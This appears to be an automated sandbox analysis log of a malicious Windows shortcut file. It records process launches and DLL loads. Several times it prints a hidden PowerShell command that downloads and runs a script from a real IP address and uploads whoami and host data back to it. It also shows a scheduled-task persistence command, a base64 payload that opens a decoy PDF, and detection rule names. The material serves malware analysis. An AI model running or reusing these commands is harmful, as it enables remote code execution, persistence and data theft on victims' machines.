              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}
              Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
              Source: unknownProcess created: Commandline size = 25303
              Source: Process Memory Space: powershell.exe PID: 6496, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.expl.evad.winLNK@28/51@1/3
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Libraries\Recorded.vbsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7344:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6300:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hqkvfyiw.kd2.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='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
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
              Source: 140AEcuVy7.lnkReversingLabs: Detection: 52%
              Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='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
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\appdata\local\temp\document.pdf"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /TN OneDriveCoreTask-S-1-5-21-5466262771-899953646639-1001 /SC minute /mo 4 /tr C:\Users\Public\Libraries\Recorded.vbs /f
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Recorded.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2084 --field-trial-handle=1728,i,12702411498753033684,7387674129069318371,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Recorded.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\appdata\local\temp\document.pdf"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /TN OneDriveCoreTask-S-1-5-21-5466262771-899953646639-1001 /SC minute /mo 4 /tr C:\Users\Public\Libraries\Recorded.vbs /fJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}Jump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2084 --field-trial-handle=1728,i,12702411498753033684,7387674129069318371,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
